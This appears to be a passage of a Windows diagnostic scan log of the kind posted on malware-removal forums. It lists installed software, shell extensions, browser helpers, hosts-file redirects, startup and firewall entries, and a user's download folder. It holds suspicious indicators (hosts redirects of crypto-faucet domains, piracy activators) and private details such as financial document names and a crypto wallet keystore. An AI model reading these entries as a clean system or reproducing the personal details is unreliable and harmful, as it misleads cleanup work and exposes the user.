Nástroje korektúry balíka Microsoft Office 2016 - slovenčina (HKLM\...\{90160000-001F-041B-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Orodja za preverjanje za Microsoft Office 2016 – angleščina (HKLM\...\{90160000-001F-0424-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Outils de vérification linguistique 2016 de Microsoft Office - Français (HKLM\...\{90160000-001F-040C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
PrivaZer (HKLM-x32\...\PrivaZer) (Version: 4.0.17.0 - Goversoft LLC)
Rainmeter (HKLM-x32\...\Rainmeter) (Version: 4.3.1 r3321 - Rainmeter)
Revisores de Texto do Microsoft Office 2016 – Português (Brasil) (HKLM\...\{90160000-001F-0416-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
RoboForex - MetaTrader 4 (HKLM-x32\...\RoboForex - MetaTrader 4) (Version: 4.00 - MetaQuotes Software Corp.)
Strumenti di correzione di Microsoft Office 2016 - Italiano (HKLM\...\{90160000-001F-0410-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Subtitle Edit 3.5.18 (HKLM\...\SubtitleEdit_is1) (Version: 3.5.18.1 - Nikse)
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 6.0.1254 - SUPERAntiSpyware.com)
Taalprogramma's voor Microsoft Office 2016 - Nederlands (HKLM\...\{90160000-001F-0413-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.2.2756 - TeamViewer)
Telegram Desktop version 2.5.1 (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1) (Version: 2.5.1 - Telegram FZ-LLC)
Total Commander 64+32-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 9.21a - Ghisler Software GmbH)
Tweetz Desktop verze 0.11.0 (HKLM-x32\...\{FE1B7E2D-6E96-4D39-B39F-62CA62D11A79}_is1) (Version: 0.11.0 - Mike Ward)
Uirlisí Profála Microsoft Office 2016 - Gaeilge (HKLM\...\{90160000-001F-083C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Ulož.to FileManager 2.82 (64-bit) (HKLM\...\3f2e2cd28b0e4e4396c2402fbc85a0f0_is1) (Version: 2.82 - Uloz.to cloud a.s.)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{F814D094-197F-43C8-87FA-3210BB780486}) (Version: 2.53.0.0 - Microsoft Corporation)
Veglat e kontrollit gjuhësor të Microsoft Office 2016 - shqip (HKLM\...\{90160000-001F-041C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
VLC media player (HKLM\...\VLC media player) (Version: 3.0.8 - VideoLAN)
Web Launch Recorder (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\WebLaunchRecorder) (Version: 2.0 - )
Εργαλεία γλωσσικού ελέγχου του Microsoft Office 2016 - Ελληνικά (HKLM\...\{90160000-001F-0408-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Засоби перевірки правопису Microsoft Office 2016 – українська (HKLM\...\{90160000-001F-0422-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Средства проверки правописания Microsoft Office 2016 — русский (HKLM\...\{90160000-001F-0419-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
כלי ההגהה של Microsoft Office 2016 - עברית (HKLM\...\{90160000-001F-040D-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
ابزارهای تصحیح Microsoft Office 2016 - فارسی (HKLM\...\{90160000-001F-0429-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden

Packages:
=========
Deezer Music -> C:\Program Files\WindowsApps\Deezer.62021768415AF_4.32.0.0_x86__q7m17pa7q8kj0 [2021-01-19] (Deezer SA)
Easy WOL (Wake on LAN) -> C:\Program Files\WindowsApps\1460ArunasAdomaitis.EasyWOLWakeonLAN_1.1.1.0_x64__fzh5k4x0zh00p [2019-05-21] (Arunas Adomaitis)
Facebook -> C:\Program Files\WindowsApps\Facebook.Facebook_186.2619.19263.0_x86__8xx8rvfyw5nnt [2019-10-10] (Facebook Inc)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-02-03] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-02-03] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.9.1102.0_x64__8wekyb3d8bbwe [2021-01-13] (Microsoft Studios) [MS Ad]
Microsoft To Do -> C:\Program Files\WindowsApps\Microsoft.Todos_2.36.4182.0_x64__8wekyb3d8bbwe [2021-01-19] (Microsoft Corporation) [Startup Task]
Minecraft for Windows 10 -> C:\Program Files\WindowsApps\Microsoft.MinecraftUWP_1.16.20102.0_x64__8wekyb3d8bbwe [2020-12-16] (Microsoft Studios)
Samsung Printer Experience -> C:\Program Files\WindowsApps\SAMSUNGELECTRONICSCO.LTD.SamsungPrinterExperience_1.3.15.0_x64__3c1yjt4zspk6g [2017-02-03] (Samsung Electronics Co. Ltd.)
Twitter -> C:\Program Files\WindowsApps\9E2F88E3.Twitter_6.1.4.1000_neutral__wgeqdkkx372wm [2018-09-08] (Twitter Inc.)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers1: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers1: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers2: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers2: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers3: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers4: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers4: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\WINDOWS\system32\igfxpph.dll [2012-11-26] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )

==================== Codecs (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Drivers32: [vidc.ffds] => C:\Windows\SysWOW64\ff_vfw.dll [7680 2009-12-17] () [File not signed]

==================== Shortcuts & WMI ========================

==================== Loaded Modules (Whitelisted) =============

2019-10-12 11:29 - 2016-07-21 09:54 - 000137728 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSCreateVC.dll
2019-10-12 11:29 - 2016-10-08 16:03 - 001506304 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\DAQExp.dll
2019-02-28 17:03 - 2019-02-28 17:03 - 000424448 _____ (Florian Heidenreich) [File not signed] C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll
2017-01-30 09:21 - 2016-10-04 15:51 - 000076800 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll
2019-10-12 11:29 - 2016-10-08 16:04 - 000708608 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSProducstInfo.dll

==================== Alternate Data Streams (Whitelisted) ========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:0888F409 [284]
AlternateDataStreams: C:\ProgramData\TEMP:3440EB47 [143]
AlternateDataStreams: C:\ProgramData\TEMP:66633281 [159]
AlternateDataStreams: C:\ProgramData\TEMP:93433455 [820]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20171231_D_007_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20190831_K_008_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\102394978_1.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2018-03-12 12_24_15-Historie transakcí _ SERVIS 24.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2568bee2-7540-4a15-b62b-abf4c8ec8122.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\61cd06ea-2cc3-448b-9ead-882a3b596714.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\avidemux_2.7.1_win32.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\ChromeSetup.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\cpg15x:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\creditNote_1900000049.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\desktop (New).ini:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\e8318c29-e1d9-482a-b440-976b38e0cf1e.tmp:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce (1).PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura mining 2.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura12. 9. 2018.pdf:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktuta mining 001.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\IMG_20180407_084256.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\index.php:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\invoice_180105480.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\JDownloader:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\jollycoin-node-1.0.tar.xz:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\kalendar_2018_str_2_p000000.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Kalendář-2018-1.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\KMS_2038 & Digital & Online Activation Suite v8.4:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio2.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Malwarebytes Anti-Malware 3.6.1.2711.rar:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18 (1).jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003 (1).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\PA2018040002.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\payeer_mastercard_en.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc (1.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Plná moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\priloha1.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\readme.txt:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Recepty_pro_horkovzdušnou_fritézu_R-286__CZ__11.11.2016.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\reklamacni_list.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Reklamacny-formular-vasmobil.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Shhq5QS4WNM18Ap85GVYjpNctzp3LRFeZP.json:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 14. 7. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 26. 6. 2018 (2).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Spořitelna.png:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TeamViewerQS.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Telegram Desktop:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TH_20180601-20180623.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TRUSTED_TunePat_Netflix_Video_keygen:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Ulozto:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\UTC--2017-11-14T18-20-12.713Z--984d522fcd4684d49e0d08715da5c20cba86eceb:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vypis z klientskeho uctu za obdobi 1802.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vypoved-pojistne-smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (1).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (2).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vzor_vypovedi_pojistne_smlouvy.docx:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\wordpress:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Zadost 26. 6. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\__MACOSX:com.dropbox.attrs [54]

==================== Safe Mode (Whitelisted) ==================

==================== Association (Whitelisted) =================

==================== Internet Explorer (Whitelisted) ==========

BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: WebTransBHO Class -> {2DB66063-BB98-466A-AA0D-3E7ACF5ED853} -> C:\TRANSLAT\Translator_2016.03\WebIE.dll [2019-01-28] () [File not signed]
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\ssv.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\jp2ssv.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
Toolbar: HKLM-x32 - WebTranslator - {BFC32E1D-EE75-4A48-BC60-104E11EE2431} - C:\TRANSLAT\Translator_2016.03\WebIE.dll [2019-01-28] () [File not signed]
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2016-07-16 12:47 - 2020-03-06 18:30 - 000001029 ____R C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1 www.langsoft.cz
127.0.0.1 www.pctranslator.cz
177.9.78.49 ww1.moondoge.co.in
177.9.78.49 ww1.moonbit.co.in

2019-11-30 16:39 - 2019-11-30 16:44 - 000000439 _____ C:\WINDOWS\system32\drivers\etc\hosts.ics

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\theme1\img13.jpg
DNS Servers: 192.168.0.1 - 1.1.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(If an entry is included in the fixlist, it will be removed.)

HKLM\...\StartupApproved\Run32: => "Dropbox"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\StartupFolder: => "Poslat do aplikace OneNote.lnk"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\StartupFolder: => "IQTray.lnk"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\Run: => "Microsoft Software Essentials"

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [UDP Query User{4CF5DFC9-9461-49D6-950C-BB62564F6244}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [TCP Query User{CD7B74D8-A37B-4004-84B4-A34E0A3D68ED}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [UDP Query User{BC12CC3D-9EB7-430F-A11E-D240044FD1A6}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [TCP Query User{E1BC68F1-347B-4940-8A33-5D907DBCDA84}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [UDP Query User{29287B3F-2A2F-4C57-A399-98061B1E6F2B}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [TCP Query User{7E06897A-6AF1-466E-9D68-134E4975B2C8}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [{793400D7-7C54-425B-9BD7-60F988299959}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{D34719B9-E1F9-42F6-BA3A-AA6AF2D45F2E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{2F9D3059-4454-4A07-BEE5-D6684A9BC8B9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{033BC72C-1DEC-4D1D-87CB-14942A26DDDB}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [UDP Query User{25003063-5796-4BA7-9F27-DF50B557D31D}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [TCP Query User{E8D4CD91-1165-4346-8883-1D96257E6F52}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [{ADECB0C0-D817-4AFC-AB5F-3E7FDA043DFE}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{CC710CB0-69B1-4D2B-9AAE-B86204635A9F}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{DE047D0E-57E7-42E5-852F-33C6129D3B85}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [UDP Query User{0AAFD932-9B41-400A-B798-B7F6A5298120}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [TCP Query User{0FFA7186-061D-43D7-922F-73C9FE27F461}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [UDP Query User{D7909A0E-59A3-44AA-AD21-357E7A504E90}C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe] => (Allow) C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe (Appwork GmbH -> AppWork GmbH)
FirewallRules: [TCP Query User{60724E25-F8FD-44AA-9BC9-A2ADC8EC3C89}C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe] => (Allow) C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe (Appwork GmbH -> AppWork GmbH)
FirewallRules: [{C9001568-7E61-4092-92AC-A2A34F885F7B}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{4E0915DD-85DC-4816-9616-A952C0C0C79C}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{1AB3D34D-2096-4639-A6F4-DB0021276C1B}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{8A8D7038-61CD-44CF-88BD-3B4A6221113F}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{6E0C9F16-EE9A-44B8-9451-7D5FB88A5D9D}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{EB36692E-B7B2-42BD-BC9B-B5B9C427A112}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{2E494270-3352-4EE4-9BEB-DFDABEB0B492}C:\utorrent\utorrent.exe] => (Allow) C:\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [UDP Query User{CE8260C1-93C7-47AF-97D4-687806A341AB}C:\utorrent\utorrent.exe] => (Allow) C:\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [TCP Query User{41A0FD6F-32C7-4629-843F-F84BD1CF7F57}C:\totalcmd\totalcmd64.exe] => (Allow) C:\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH)
FirewallRules: [UDP Query User{F7DDB9BD-EF26-4906-BD31-A72205B5AFBB}C:\totalcmd\totalcmd64.exe] => (Allow) C:\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH)
